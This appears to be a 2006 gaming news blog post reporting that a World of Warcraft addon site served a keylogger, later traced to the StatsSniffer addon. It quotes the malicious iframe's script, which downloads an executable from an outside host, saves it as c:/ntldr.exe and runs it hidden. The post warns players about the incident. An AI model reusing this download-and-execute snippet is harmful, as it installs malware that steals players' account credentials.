Posted Dec 21, 2006 at 02:17AM by Ryan A. Listed in: News
Ó

This is not the first time we will report on keylogging incidents for goliath MMO, World of Warcraft. Before we proceed though, let us make sure first that we are on the same page, okay?

Keystroke logging or keylogging per se is not inherently bad. Originally, it was developed to detect sources of errors in computer systems. The problem now is that same genius of a program is being used for hacking and spamming. The scam usually begins by telling a user to click on a link. Instead of bringing that user to the intended location, a keylogging software is installed discreetly. This then can be used to pick up usernames and passwords.

Now, on the official WoW forums, several users are claiming that a similar software is embedded into modification site ui.worldofwar.net. This is rather big news because the said site is one of the more "known and trusted" by players. Even here at QJ, we occasionally share with you tweaks from from that site.

One user provided these info
rmation:

  • keylogging scriptThe keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe
  • The actual keylogger iframe: hxxp://ui.bcegame.com/wm.htm
  • Keylogger iframe src:
             xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
             xPost.Send();
             var sGet=df.CreateObject('ADODB.Stream','');
             sGet.Mode=3;
             sGet.Type=1;
             sGet.Open();
             sGet.Write(xPost.ResponseBody);
             sGet.SaveToFile('c:/ntldr.exe',2);
             var x = df.CreateObject('wscript.shell','');
             x.run('c:/ntldr.exe',0);

Currently, several group of WoW players are telling the community to ban and abandon the modification site. Ar any rate, we will update you as things develop further. Thanks Victor for the heads up!


Read Permalink  |   Email this  |   Linking Blogs   |   Digg It!

Bookmark / Find this article on:


1 Comments


Sort by:
   by Advertising -
   by D (Unregistered) - 2006-12-21
 » Update


http://wow.warcry.com/scripts/news/view_news.phtml?site=19&id=67070

UPDATE:
It looks like the mod/add-on called Stats Sniffer was the culprit. Somehow the mod author was able to put an IFrame into StatsSniffer add-on title. As of right now the mod called StatsSniffer was removed from the site.



Featured Content
QJ.NET Blog Network RSS Feeds
MyQJ Feed / PDA
MyQJ RSS / PDA
Blog of Blogs Feed / PDA
QJ.NET RSS / PDA
Gaming Consoles Feed / PDA
Nintendo DS RSS / PDA
PlayStation 3 RSS / PDA
PSP Updates RSS / PDA
Wii RSS / PDA
Xbox 360 RSS / PDA
PC Gaming Feed / PDA
Age of Conan RSS / PDA
Games for Windows RSS / PDA
MMORPG RSS / PDA
Tabula Rasa RSS / PDA
World of Warcraft RSS / PDA
Science Feed / PDA
Science RSS / PDA
Technology Feed / PDA
Apple RSS / PDA
Gadgets RSS / PDA
Mobile RSS / PDA
Photography RSS / PDA
Tech RSS / PDA
Add QJ.NET
Add to My Yahoo!
Google Reader Subscribe with Bloglines
Add  to your Kinja digest Subscribe in NewsGator Online
Subscribe with Pluck RSS reader Add 'www.qj.net' to Newsburst from CNET News.com
Subscribe with SearchFox RSS del.icio.us www.qj.net
Add to Technorati Favorite! Add to My AOL
furl! it Stumble for Treehugger!